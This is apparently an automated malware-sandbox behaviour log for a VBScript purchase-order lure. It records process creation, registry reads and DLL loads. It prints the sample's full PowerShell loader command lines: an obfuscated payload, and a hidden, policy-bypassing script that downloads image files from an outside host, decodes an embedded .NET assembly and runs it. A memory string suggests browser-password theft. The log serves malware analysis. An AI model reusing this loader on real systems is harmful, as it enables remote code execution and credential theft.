Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3336:120:WilError_03

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4dl4nswl.53v.ps1

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\orden de compra.vbs"

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: AddInProcess32.exe, 00000004.00000002.2973300391.0000000002AEF000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: orden de compra.vbs

ReversingLabs: Detection: 15%

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\orden de compra.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.orboy/451.342.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreY	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.orboy/451.342.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasman.dll	Jump to behavior
